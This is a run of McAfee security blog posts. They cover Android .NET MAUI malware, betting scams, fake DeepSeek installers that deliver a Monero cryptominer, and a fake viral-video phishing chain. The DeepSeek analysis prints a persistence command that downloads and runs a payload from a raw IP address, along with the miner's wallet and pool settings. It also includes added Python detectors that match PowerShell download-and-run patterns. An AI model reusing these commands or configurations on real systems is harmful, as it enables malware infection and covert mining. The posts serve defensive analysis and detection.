    Another key technique is encrypted socket communication. Instead of standard HTTP requests, which an HTTP proxy can intercept and display, the malware talks to its C2 over raw TCP socket connections, so the proxy tools analysts usually reach for see nothing. The traffic can still be captured at the network layer, on the device or with a packet capture upstream, but the malware encrypts the data before sending it, so even captured packets do not reveal their contents without the key recovered from the code.

    One more important aspect to note is that this malware adopts various themes to attract users. In addition to the fake X app, we also discovered several dating apps that use the same techniques. These apps had different background images but shared the same structure and functionality, indicating that they were likely created by the same developer as the fake X app. The continuous emergence of similar apps suggests that this malware is being widely distributed among Chinese-speaking users. 

     

    Figure 8. Various fake apps using the same technique 

     

    Recommendations and Conclusion 

    The rise of .NET MAUI-based malware highlights how cybercriminals are evolving their techniques to avoid detection. Some of the techniques described include:  

    • hiding code blobs within assemblies 
    • multi-stage dynamic loading 
    • encrypted communications 
    • excessive obfuscation 

    With these evasion techniques, the threats can remain hidden for long periods, making analysis and detection significantly more challenging. Furthermore, the discovery of multiple variants using the same core techniques suggests that this type of malware is becoming increasingly common.  

    Users should always be cautious when downloading and installing apps from unofficial sources, as these platforms are often exploited by attackers to distribute malware. This is especially concerning in countries like China, where access to official app stores is restricted, making users more vulnerable to such threats. 

    To keep up with the rapid evolution of cybercriminal tactics, users are strongly advised to install security software on their devices and keep it up to date at all times. Staying vigilant and ensuring that security measures are in place can help protect against emerging threats. By using McAfee Mobile Security, users can enhance their device protection and detect threats related to this type of malware in real-time. 

     

    Glossary of Terms 

     

    Indicators of Compromise (IOCs) 

    APKs: 

     

    C2: 

    • tcp[://]120.27.233.135:1833 
    • https[://]onlinedeskapi.com 

    The post New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI  appeared first on McAfee Blog.

    How to Protect Yourself from March Madness Scams

    By: McAfee

    It’s the month of top seeds, big upsets, and Cinderella runs by the underdogs. With March Madness basketball cranking up, a fair share of online betting will be sure to follow—along with online betting scams. 

    Since a U.S. Supreme Court ruling in 2018, individual states can determine their own laws for sports betting. Soon after, states leaped at the opportunity to legalize it in some form or other. Today, nearly 40 states and the District of Columbia have “live and legal” sports betting, meaning that people can bet on single-game sports through a retail or online sportsbook or a combination of the two in their state. 

    And it has made billions of dollars for the government.

    If you’re a sports fan, this news has probably been hard to miss, or at least its outcome has. Commercials and signage in and around games promote several major online betting platforms. Ads have naturally made their way online too, complete with promo offers to encourage people to get in on the action. That has also opened the door for scammers looking to take advantage of people who want to bet online, according to the Better Business Bureau (BBB), often through shady or outright phony betting sites.

    Let’s take a look at the online sports betting landscape, some of the scams that are cropping up, and some things you can do to make a safer bet this March or any time.  

    Can I bet on sports in my state, and how? 

    Among the 30 states that have “live and legal” sports betting, 19 offer online betting, a number that will likely grow given various state legislation that’s either been introduced or will be introduced soon. 

    If you’re curious about what’s available in your state, this interactive map shows the status of sports betting on a state-by-state level. Further, clicking on an individual state on the map will give you yet more specifics, such as the names of retail sportsbooks and online betting services that are legal in the state. For anyone looking to place a bet, this is a good place to start. It’s also helpful for people who are looking to get into online sports betting for the first time, as this is the sort of homework that the BBB advises people to do before placing a sports bet online. In their words, you can consider these sportsbooks to be “white-labeled” by your state’s gaming commission.

     

    However, the BBB stresses that people should be aware that the terms and conditions associated with online sports betting will vary from service to service, as will the promotions that they offer. The BBB accordingly advises people to closely read these terms, conditions and offers. For one, “Gambling companies can restrict a user’s activity,” meaning that they can freeze accounts and the funds associated with them based on their terms and conditions. Also, the BBB cautions people about those promo offers that are often heavily advertised, “[L]ike any sales pitch, these can be deceptive. Be sure to read the fine print carefully.” 

    Scammers and online betting 

    Where do scammers enter the mix? The BBB points to the rise of consumer complaints around bogus betting sites: 

    “You place a bet, and, at first, everything seems normal. But as soon as you try to cash out your winnings, you find you can’t withdraw a cent. Scammers will make up various excuses. For example, they may claim technical issues or insist on additional identity verification. In other cases, they may require you to deposit even more money before you can withdraw your winnings. Whatever you do, you’ll never be able to get your money off the site. And any personal information you shared is now in the hands of scam artists.” 

    If there’s a good reason you should stick to the “white labeled” sites that are approved by your state’s gaming commission, this is it. Take a pass on any online ads that promote betting sites, particularly if they roll out big and almost too-good-to-be-true offers. These may lead you to shady or bogus sites. Instead, visit the ones that are approved in your state by typing in their address directly into your browser. 

    Ready to place your bet? Keep these things in mind. 

    In addition to what we mentioned above, there are several other things you can do to make your betting safer. 

    1) Check the rep of the service.

    In addition to choosing a state-approved option, check out the organization’s BBB listing at BBB.org. Here you can get a snapshot of customer ratings, complaints registered against the organization, and the organization’s response to the complaints, along with its BBB rating, if it has one. Doing a little reading here can be enlightening, giving you a sense of what issues arise and how the organization has historically addressed them. For example, you may see a common complaint and how it’s commonly resolved. You may also see where the organization has simply chosen not to respond, all of which can shape your decision whether to bet with them or not. 

    2) Use a secure payment method other than your debit card.

    Credit cards are a good way to go. One reason is the Fair Credit Billing Act, which gives you the right to dispute billing errors on a credit card, including charges for goods and services that were never delivered, and which caps your liability for unauthorized charges at $50. Your credit card company may have its own policies that improve on the Act as well. Debit cards, which draw directly on your bank account, don’t get the same protection under the Act. 

    3) Get online protection.

    Comprehensive online protection software will defend you against the latest virus, malware, spyware, and ransomware attacks plus further protect your privacy and identity. In addition to this, it can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who may try to force their way into your accounts. And, specific to betting sites, online protection can help prevent you from clicking links to known or suspected malicious sites. 

    Make the safe(r) bet 

    With online betting cropping up in more and more states for more and more people, awareness of how it works and how scammers have set up their presence within it becomes increasingly important. Research is key, such as knowing who the state-approved sportsbooks and services are, what types of betting are allowed, and where. By sticking to these white-label offerings and reading the fine print in terms, conditions, and promo offers, people can make online betting safer and more enjoyable. 

    Editor’s Note: If gambling is a problem for you or someone you know, you can seek assistance from a qualified service or professional. Several states have their own helplines, and nationally you can reach out to resources like http://www.gamblersanonymous.org/ or https://www.ncpgambling.org/help-treatment/

    The post How to Protect Yourself from March Madness Scams appeared first on McAfee Blog.

    Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users

    Authored by Aayush Tyagi and M, Mohanasundaram 

    *Bold = Term Defined in Appendix

    In this blog, we discuss how malware authors recently used a popular new trend to entice unsuspecting users into installing malware. This blog is meant as a reminder to stay cautious during a hype cycle. It’s a common trap and pitfall for unassuming consumers. 

    Background

    Figure 1: DeepSeek Google Search Trend from 1st January to 7th March 

    Malware creators frequently exploit trending search terms through hashtags and SEO manipulation to boost visibility and climb search rankings. This tactic, known as SEO poisoning, helps drive traffic to malicious sites, increasing downloads or earning rewards through affiliate programs. Recently, “AI” (Artificial Intelligence) has been one of the most popular keywords leveraged in these scams. Earlier this year, “DeepSeek” also gained traction, even surpassing “Nvidia” at its peak in search interest.

    Let’s look at how we got here. Artificial Intelligence (AI) tools are transforming the world at an unprecedented pace, right before our eyes. In recent years, we’ve witnessed remarkable advancements in Generative AI, from highly successful frontier LLMs (Large Language Models) such as ChatGPT, Gemini, LLaMA and Grok, to their applications as coding assistants (GitHub Copilot or Tabnine), meeting assistants, and voice cloning software, to name the more popular ones.

    These tools are pervasive and easily available at your fingertips. In today’s world AI isn’t just a complicated term utilized by select organizations, it’s now adopted by every household in one way or another and is reshaping entire industries and economies.  

    With the good comes the bad, and unfortunately AI has enabled an accelerated ecosystem of scammers adopting these tools – examples are: 

    • creating deepfake videos for fake propaganda or fake advertising 
    • creating voice clones for “hey mum” scams or imposter scam voice mails from the IRS 
    • generating almost perfect-sounding text and emails for socially engineered scams leading to phishing 
    • generation of images to evoke sentiments resulting in charity scams 

    Besides the application of AI tools that empower scammers, there is the good old use case of piggybacking on popular news trends, where popular search terms are used to bait gullible users (read our blog on how game cracks are used as lures to deliver malware). One such popular news-worthy term that is being abused is DeepSeek, which McAfee discussed early this year. 

    Jumping on the DeepSeek-Hype Bandwagon  

    The launch of the DeepSeek-R1 model (by DeepSeek, a Chinese company) generated significant buzz. DeepSeek claims the model was built, and can be run, for a fraction of the cost of comparable Generative AI models such as OpenAI’s GPT-4o or Meta’s Llama 3.1. Moreover, the R1 model was released in January 2025 under an open-source license.  

    Within a few days of the release of the DeepSeek-R1 model, the Deepseek AI assistant—a chatbot for the R1 model—was launched on the Apple App Store and later the Google Play Store. In both app stores, Deepseek’s chatbot, which is an alternative to OpenAI’s ChatGPT, took the No. 1 spot and has been downloaded over 30 million times.  

    This stirred up the curiosity of many who wanted to experiment with the model. The interest spiked to a point where the DeepSeek website was unavailable at times due to the sheer volume of people trying to set up accounts or download the app. This mix of excitement, anxiety and impatience is exactly what scammers look for in their victims. Not long after the term went “viral”, scammers saw an opportunity and began distributing malware disguised as DeepSeek. Various malware campaigns followed, including crypto-miners, fake installers, DeepSeek impersonator websites, and fake DeepSeek mobile apps.  

    First Things First – Am I Protected? 

    At McAfee Labs, we work hard to keep you safe, but staying informed is always a smart move. When navigating trending news stories, it’s important to stay cautious and take necessary precautions. We continuously track emerging threats across multiple platforms—including Windows, macOS, Android, iOS, and ChromeOS—to ensure our customers remain protected. While we do our part, don’t forget to do yours: enable Scam Protection, Web Protection, and Antivirus in your preferred security product.

    McAfee products offer advanced AI-powered protection across all tiers—Basic, Essential, Premium, Advanced, and Ultimate. Our AI-Suite includes features like AI-powered Antivirus, Text Scam Detection, Web Protection, VPN, and Identity Protection, providing comprehensive security.

    Check out McAfee Scam Detector, which enhances our ability to combat a wide range of scams and is included in our products at no extra cost.

    For more tips on avoiding scams and staying safe online, visit the McAfee Smart AI Hub at mcafee.ai. You can also explore the latest insights on the State of the Scamiverse on McAfee’s blog and stay up to date on scam prevention strategies.

    Together, we can outsmart scammers and make the internet safer for everyone.

     

    DeepSeek Malware Campaign Examples 

    In the rest of this article, we use simple examples to delve into more technical details for those seeking more analysis details. 

    McAfee Labs uncovered a variety of DeepSeek-themed malware campaigns attempting to exploit its popularity and target tech-savvy users. Multiple malware families were able to distribute their latest variants under the false pretense of being DeepSeek software.  

    Figure 2: Attack Vector 

    Users encountered these threats while searching for information about DeepSeek AI on the internet. They found websites offering DeepSeek installers for different platforms, such as Android, Windows and Mac. McAfee Labs found that a number of these installers were trojanized or simply repackaged applications. We identified multiple instances of keyloggers, crypto miners, password stealers, and trojan downloaders being distributed as DeepSeek installers.  

    Example 1: Fake Installers and Fake Android Apps 

    Figure 3: DeepSeek Installers

    In Figure 3, we encountered fake installers that distribute third-party software such as winManager (highlighted in red) and Audacity (highlighted in blue).  

    In the simplest abuse of the DeepSeek name, certain affiliates were able to spike their partner downloads and get a commission based on pay-per-install partner programs. Rogue affiliates use this tactic to generate revenue through forced installations of partner programs.  

    Similar installers were also observed using the DeepSeek icon to appear more believable, or alternatively serving click ads and modifying browser settings (such as the default search engine) with the goal of generating additional ad revenue. 

    Figure 4: winManager (left) and Audacity (right)

    The Deepseek icon was also misused by multiple Android applications to deceive users into downloading unrelated apps, thereby increasing download counts and generating revenue. 

    Figure 5: Android files abusing DeepSeek’s Logo

     

    Example 2: Fake Captcha Page 

    We also encountered DeepSeek-themed fake CAPTCHA pages. This technique (commonly referred to as ClickFix) isn’t new; it was used as recently as six months ago by LummaStealer. 

    A fake CAPTCHA is a web page that asks users to verify that they are human but instead tricks them into downloading and executing malicious software. That malware can then steal login credentials, browser data and more.  

    Figure 6: Fake Captcha Page 

    In this instance, the website deepseekcaptcha[.]top pretends to offer a partnership program for content creators. They are utilizing the technique called ‘Brand Impersonation’, where they’re using DeepSeek’s Icons and color scheme to appear as the original website. 

    Figure 7: deepseekcaptcha[.]top

    Once the user registers for the program, they’re redirected to the fake captcha page. 

    Figure 8: Fake Captcha Page hosted on the website 

    Here, as shown above, the page asks the user to “verify their identity” by pressing Windows + R to open the Run dialog and then pressing CTRL + V. The page has already placed a command on the clipboard, so CTRL + V pastes that command into the Run dialog; no CAPTCHA is actually being solved.  

    The user would observe a screen as shown in figure 9.  

    Figure 9: Windows Run panel after copying the CMD 

    On clicking ‘OK’, the pasted command runs and installs malware that can steal browser and financial information from the system. 

    McAfee’s Web Advisor protects against such threats. In this instance, the fake CAPTCHA page was blocked and marked as suspicious before it could be accessed. Even if you aren’t a McAfee customer, you can check out the browser plugin for free.  

    Figure 10: McAfee blocking malicious URL 

     

    Example 3: Technical Analysis of a Crypto Miner 

    In this section we look at a *Cryptominer that was masquerading as DeepSeek. By blocking the initial payload, we prevent the chain of events shown in Figure 11, which would have degraded the device’s performance and potentially exposed it to further infection attempts. 

    Some example names used by the initial loader were: 

    • DeepSeek-VL2.Developer.Edition.exe 
    • DeepSeek-R1.Leaked.Version.exe 
    • DeepSeek-VL2.ISO.exe 

    Figure 11: CryptoMiner KillChain

    Initial Execution 

    Once installed, this malware contacts its *C&C (Command and Control) server to download and execute a *PowerShell script. Figures 12(a) and 12(b) show the malware connecting to the C&C IP address to download the script in chunks, which are then written to the AppData\Roaming folder as installer.ps1.  

    Figure 12(a): Sample connects to C&C IP Address 

    Figure 12(b): Installer.ps1 stored in Roaming folder

    Injection  

    The loader then launches the script with PowerShell’s execution policy set to Bypass: 

    • /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File “C:\Users\admin\AppData\Roaming\installer.ps1” 
    • Note that -ExecutionPolicy Bypass is not a security bypass in the exploit sense: the execution policy is a safety setting that any user can override from the command line, which is exactly why malware sets it routinely. 
    • The ‘installer.ps1’ contains malicious code which is injected into another process and executed using a technique called *Process Injection (Figure 14) 
    • Figure 13 shows how the malware Base64-encodes this script to avoid detection 

    Figure 13: Base64 Encoded Malicious Code

    Figure 14: PowerShell code for Process Injection.

    *Persistence  

    Malware attempts to maintain persistence on the Victim’s computer.  

    • It executes reg.exe with the following command line (Figure 15) 
    • reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri 45[.]144[.]212[.]77:16000/client -OutFile C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f 

     

    Figure 15: Creating Run Key entry to maintain persistence

    • This command retrieves a file named client.exe from the C2 server (served at the /client path), saves it in the Startup folder as runps.exe, and executes it as the *Payload. Dropping it into the Startup folder gives the malware a second persistence path, since anything in that folder runs at logon even if the Run key entry is removed. The file runps.exe is identified as *XMRig mining software.  
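    The Run key value above, and the command that the fake CAPTCHA page in Example 2 pastes into the Run dialog (Windows keeps a history of those under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), are both one-line PowerShell download-and-run commands. The following is an added example, not McAfee’s code, that scores such command lines for that pattern: execution-policy override, hidden window, Base64 -EncodedCommand (decoded as UTF-16LE and re-scanned), a download cmdlet, a raw-IP URL, a drop into the Startup folder, and execution of the fetched file. The Run-key dump it scans is constructed: the first entry mirrors the reg.exe command on this page, the others are a benign entry and an obfuscated variant using the documentation address 203.0.113.5.

```python
"""Score Windows autostart command lines for the download-and-run pattern:
a Run-key value (or Startup-folder entry) that launches PowerShell, fetches
a payload from a raw IP address and executes it.

Added example, not McAfee's code. SAMPLE_RUN_VALUES is constructed.
"""
import base64
import re

# Indicator name -> (pattern, weight). Patterns are matched against the raw
# command line plus, when present, the decoded -EncodedCommand payload.
INDICATORS = {
    # -ExecutionPolicy Bypass / -ep bypass: not a security boundary, but
    # rare in legitimate autostart entries.
    "execution_policy_bypass": (re.compile(r"-(?:ex[a-z]*|ep)\s+(?:bypass|unrestricted)", re.I), 1),
    # -WindowStyle Hidden / -w h
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 1),
    # PowerShell download primitives and their aliases
    "download_cmdlet": (re.compile(
        r"\b(?:invoke-webrequest|iwr|curl|wget|invoke-restmethod|irm|"
        r"downloadfile|downloadstring|start-bitstransfer)\b", re.I), 2),
    # URL whose host is a bare IPv4 address (optionally with a port), in URL context
    "raw_ip_url": (re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?/"), 2),
    # Writes into the per-user Startup folder: a second persistence path
    "writes_startup_folder": (re.compile(r"start menu\\programs\\startup|shell:startup", re.I), 2),
    # Executes whatever was just fetched
    "executes_download": (re.compile(r"\b(?:start-process|saps|invoke-expression|iex|invoke-item)\b", re.I), 1),
}
ENCODED_WEIGHT = 2
# -e / -ec / -en / -enc / -EncodedCommand followed by a Base64 blob
ENCODED_RE = re.compile(r"-e(?:n(?:c(?:odedcommand)?)?|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)
SUSPICIOUS_THRESHOLD = 5


def decode_encoded_command(cmd: str):
    """Return the UTF-16LE text behind a -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command(cmd: str) -> dict:
    """Match every indicator against the command line and its decoded payload."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = {name for name, (rx, _) in INDICATORS.items() if rx.search(text)}
    score = sum(INDICATORS[name][1] for name in hits)
    if decoded is not None:
        hits.add("encoded_command")
        score += ENCODED_WEIGHT
    return {"indicators": sorted(hits), "score": score, "decoded": decoded,
            "suspicious": score >= SUSPICIOUS_THRESHOLD}


def scan_run_values(values):
    """Return (value name, analysis) for every entry that crosses the threshold."""
    flagged = []
    for name, cmd in values:
        result = analyze_command(cmd)
        if result["suspicious"]:
            flagged.append((name, result))
    return flagged


# Constructed sample: an obfuscated variant of the same download-and-run idea.
OBFUSCATED_PAYLOAD = base64.b64encode(
    "iwr http://203.0.113.5/update/x.exe -OutFile $env:TEMP\\x.exe".encode("utf-16le")
).decode()

# Constructed sample: (value name, command) pairs as exported from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Entry 1 mirrors the
# reg.exe command on this page (defanging brackets removed).
SAMPLE_RUN_VALUES = [
    ("WindowsUpdate",
     "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest "
     "-Uri 45.144.212.77:16000/client -OutFile C:\\Users\\admin\\AppData\\Roaming"
     "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\runps.exe; "
     "Start-Process C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows"
     "\\Start Menu\\Programs\\Startup\\runps.exe"),
    ("OneDrive",
     "\"C:\\Users\\admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"),
    ("Updater", "powershell -w hidden -e " + OBFUSCATED_PAYLOAD),
]

if __name__ == "__main__":
    for name, result in scan_run_values(SAMPLE_RUN_VALUES):
        print(f"{name}: score={result['score']} {result['indicators']}")
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

    The weights are deliberately simple: a single indicator such as -ExecutionPolicy Bypass is common in admin scripts, but a download cmdlet pointed at a raw IP that writes into the Startup folder is not. Feed the same function the RunMRU values, Sysmon Event ID 1 command lines, or the values of HKLM\...\Run and you get the same scoring across all three sources.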

    Payload 

    • To initiate the mining process, it connects to the same C2 server and downloads additional parameters.  

    Figure 16: HTTP response that contains additional parameters 

    [{"address":"494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3","idle_threads":90,"idle_time":1,"password":"x","pool":"pool.hashvault.pro:443","task":"FALLEN|NOTASK","threads":40}] 

    • These parameters tell the miner which wallet to credit, which pool to connect to, and how many CPU threads to use (with a separate thread count, idle_threads, for when the system is idle). 
    • The payload injects into Notepad.exe (a legitimate Windows process) and uses the downloaded parameters to start the mining process. 

    Figure 17: Notepad.exe being executed with additional parameters 

    • We can further understand the malware’s behavior by analyzing the command line built from the downloaded parameters:
        • --donate-level 2: the donation level is set to 2%, i.e., 2% of the total mining time is donated to the XMRig developers.  
        • -o pool.hashvault.pro:443: the mining pool to connect to, in this case pool.hashvault.pro. Port 443 lets the pool traffic blend in with HTTPS. 
        • -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3: the wallet address to which the mined cryptocurrency is credited.  
        • --cpu-max-threads-hint=40: the share of CPU threads used for mining. In this instance 40% of the available threads are used. The cap keeps the system from slowing down noticeably, so the mining is more likely to go unnoticed. Going by the field names, the idle_threads value of 90 in the configuration is the share to use once the user has been away for the idle_time interval. 
        • No GPU flags: the GPU is not used for mining, so GPU utilization monitors will not reveal the mining process.
    • Upon further analysis, we found that it is used to mine *Monero cryptocurrency, and the wallet hasn’t been reported in any scams yet. 
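    The task JSON from Figure 16 and the command-line flags analyzed above are two views of the same configuration. The following is an added example, not McAfee’s or XMRig’s code, that parses the task the C2 returned into the XMRig flags the miner builds from it and pulls out what a defender wants from it: wallet, pool, and how hard the host will be worked. The wallet check is a format check only (length and Base58 alphabet), not a checksum validation, and the pool list is a short illustrative set of public Monero pools.

```python
"""Summarize an XMRig mining task like the one the C2 returned (Figure 16).

Added example, not McAfee's or XMRig's code. TASK_JSON is the JSON quoted
on this page; KNOWN_POOL_SUFFIXES is an illustrative list.
"""
import json

# Base58 alphabet used by Monero addresses (no 0, O, I or l).
MONERO_B58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")
# Public Monero pools commonly seen in cryptojacking configs (illustrative).
KNOWN_POOL_SUFFIXES = ("hashvault.pro", "supportxmr.com", "nanopool.org", "moneroocean.stream")

TASK_JSON = (
    '[{"address":"494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3",'
    '"idle_threads":90,"idle_time":1,"password":"x","pool":"pool.hashvault.pro:443",'
    '"task":"FALLEN|NOTASK","threads":40}]'
)


def looks_like_monero_address(addr: str) -> bool:
    """Format check: standard (4...) and subaddress (8...) are 95 chars,
    integrated addresses are 106; all are Base58. No checksum is verified."""
    if not addr or addr[0] not in "48" or len(addr) not in (95, 106):
        return False
    return all(c in MONERO_B58 for c in addr)


def parse_mining_task(text: str) -> dict:
    """Turn the C2's JSON task into a structured summary."""
    task = json.loads(text)[0]
    host, _, port = task["pool"].rpartition(":")
    return {
        "wallet": task["address"],
        "wallet_format_ok": looks_like_monero_address(task["address"]),
        "pool_host": host,
        "pool_port": int(port),
        "pool_known": host.endswith(KNOWN_POOL_SUFFIXES),
        "pool_password": task.get("password", "x"),
        "active_threads_pct": task["threads"],
        "idle_threads_pct": task["idle_threads"],
        "idle_after": task["idle_time"],
        "task": task["task"],
    }


def build_xmrig_args(summary: dict, donate_level: int = 2) -> list:
    """Reconstruct the flags seen on the injected notepad.exe command line (Figure 17)."""
    return [
        "--donate-level", str(donate_level),
        "-o", f"{summary['pool_host']}:{summary['pool_port']}",
        "-u", summary["wallet"],
        "-p", summary["pool_password"],
        f"--cpu-max-threads-hint={summary['active_threads_pct']}",
    ]


def assess(summary: dict) -> list:
    """Observations about how the configuration tries to stay unnoticed."""
    notes = []
    if summary["active_threads_pct"] < 50:
        notes.append("throttled: mines on %d%% of threads while the user is active"
                     % summary["active_threads_pct"])
    if summary["idle_threads_pct"] > summary["active_threads_pct"]:
        notes.append("ramps to %d%% of threads once the host has been idle"
                     % summary["idle_threads_pct"])
    if summary["pool_port"] == 443:
        notes.append("pool on port 443: traffic blends in with HTTPS")
    if summary["pool_known"]:
        notes.append("public Monero pool: block at DNS/egress and look up the wallet's hash rate")
    return notes


if __name__ == "__main__":
    s = parse_mining_task(TASK_JSON)
    print(" ".join(build_xmrig_args(s)))
    for note in assess(s):
        print("-", note)
```

    Because the pool and wallet arrive as data rather than being baked into the binary, a network-level block on the pool hostname and a lookup of the wallet’s reported hash rate on the pool’s public stats page (as in Figure 18) are often more useful than the file hash of the miner itself.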

    Figure 18: Wallet status for the captured wallet address 

     

    Why Monero? 

    The attacker deliberately mines Monero, which prioritizes anonymity and makes the movement of funds very difficult to trace. That makes it the coin of choice for most cryptomining malware. 

     

    Appendix of Terms 

    Powershell 

    PowerShell is a cross-platform command-line shell and scripting language developed by Microsoft, primarily used for task automation and configuration management and streamlined administrative control across Windows, Linux, and macOS environments worldwide. 

    Cryptominer 

    A cryptominer is software or hardware that uses computing power to validate cryptocurrency transactions, secure decentralized networks, and earn digital currency rewards, often straining system resources and raising energy consumption. When used in the context of malware, it is unauthorized software that covertly uses infected devices to mine cryptocurrency, draining resources, slowing performance, increasing energy costs, and often remaining difficult to detect or remove. 

    Process Injection 

    This is a term used to describe a technique where malware injects its code into a legitimate running process and executes it there, so that the malicious activity appears to come from a trusted process and bypasses security measures that only inspect the original binary. 

    C&C 

    C&C (Command and Control) is a communication channel used by attackers to remotely issue commands, coordinate activities, and receive data from compromised systems or networks. 

    Persistence 

    This term refers to the techniques that malware or an attacker uses to maintain long-term access to a compromised system, even after reboots, logouts, or security interventions. Persistence ensures that the malicious payload or backdoor remains active and ready to execute even if the system is restarted or the user tries to remove it. 

    Payload 

    In malware, a payload is the main malicious component delivered or executed once the infection occurs, enabling destructive activities such as data theft, system damage, resource hogging or unauthorized control and infiltration. 

    XMRig 

    XMRig is open-source cryptocurrency mining software primarily used for mining Monero. It was originally developed as a legitimate tool for miners to efficiently use system resources to mine Monero using CPU and GPU power. However, due to its open-source nature and effectiveness, XMRig has become the most common mining engine embedded in cryptomining malware. 

     

    Monero 

    Monero (XMR) is a privacy-focused cryptocurrency that prioritizes anonymity, security, and decentralization. Launched in April 2014, Monero is designed to provide untraceable and unlinkable transactions, making it difficult for outside parties to monitor or track the movement of funds on its blockchain. It operates on a decentralized, peer-to-peer network  but with enhanced privacy features. 

     

     

    Indicators of Compromise (IoCs) 

     

    The post Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users appeared first on McAfee Blog.

    The Dark Side of Clickbait: How Fake Video Links Deliver Malware

    Authored By Sakshi Jaiswal 

    McAfee Labs recently observed a surge in phishing campaigns that use fake viral video links to trick users into downloading malware. The attack relies on social engineering, redirecting victims through multiple malicious websites before delivering the payload. Users are enticed with promises of exclusive content, ultimately leading them to fraudulent pages and deceptive download links.  

     

    Figure 1: Geo Heatmap showing McAfee customer encounters over the past 3 weeks. 

     

    Analysis 

    1. Upon opening the PDF file, the displayed page is part of a phishing scam that uses clickbait about a “viral video” to lure users into clicking suspicious links. The document contains blue hyperlinked text labeled “Watch Click Here To Link (Full Viral Video Link)” and a deceptive video player graphic, giving the illusion of a playable video. 

    Figure 2: PDF Image 

     

    2. The user clicks on “Watch Click Here To Link (Full Viral Video Link)“, which redirects them to a webpage (gitb.org) displaying fake “viral video leaked” content, excessive ads, and fake notifications to lure users. It promotes adult content, gambling, and misleading download buttons, which are common indicators of phishing or malware traps. 

    Figure 3: Redirected Webpage 

     

    3. This further redirects to malicious URL “hxxps[:]//purecopperapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1737975550-34G123G137G124-AITLS2195&keyword=Yourfile&ip=115.118.240.109&sub=22697121&source=157764” 

    Figure 4: Redirected Webpage2 

     

    4. And then redirected to below URL: “hxxps[:]//savetitaniumapp.monster/?t=d6ebff4d554677320244f60589926b97” which presents a password-protected download link hosted on Mega.nz, requiring the user to manually copy and paste the URL. 

    Figure 5: Redirected Webpage with download link 

     

    5. Upon visiting the Mega.nz URL, the site displays a loading screen while preparing the file for download and then offers a file named 91.78.127.175.zip with a size of 26.7 MB.  

     Figure 6: Screenshot of a ZIP file download from MEGA 

     

    6. Download is completed and stored in downloads folder 

    Figure 7: Zip file downloaded 

     

    7. The ZIP archive (91.78.127.175.zip, 26.7 MB) contains a password-protected .7z file together with a .png image that displays the password. Keeping the password in an image rather than in text stops automated scanners from extracting and inspecting the inner archive, while a human can still read it. 

     

    Figure 8: Files inside ZIP archive 

     

    8. The extracted .7z archive contains setup.msi, which is the actual malware payload. 

    Figure 9: setup.msi file 

    Execution  

    Upon execution of setup.msi, the malware: 

    1. Displays a CAPTCHA image to deceive users; upon clicking “OK,” it begins dropping files in the %Roaming% directory. 

    Figure 10: Screenshot of CAPTCHA image 

     

    2. Drops files into the %Roaming% directory. 

    Figure 11: Dropped multiple files in %Roaming% 

     

    Process Execution & Command Lines 

    Process Tree 

    Figure 12: Process Tree 

     

    Command Lines 

    • C:\Windows\system32\msiexec.exe /V 
      • C:\Windows\syswow64\MsiExec.exe -Embedding B8B3D9D8EE75B04B6E518D4C8B1DA31A 
      • “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\UnRar.exe” x -p156427613t -o+ “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\iwhgjds.rar” “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\” 
        • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
    • “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\obs-ffmpeg-mux.exe” 
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
      • C:\Windows\SysWOW64\explorer.exe explorer.exe 
        • powershell -windowstyle hidden -e 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 
          • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
        • C:\Windows\system32\WerFault.exe -u -p 3064 -s 316 
    • “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\createdump.exe” 
        • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
    • C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc 
    • C:\Windows\System32\svchost.exe -k WerSvcGroup 
      • C:\Windows\system32\WerFault.exe -pss -s 432 -p 3064 -ip 3064 
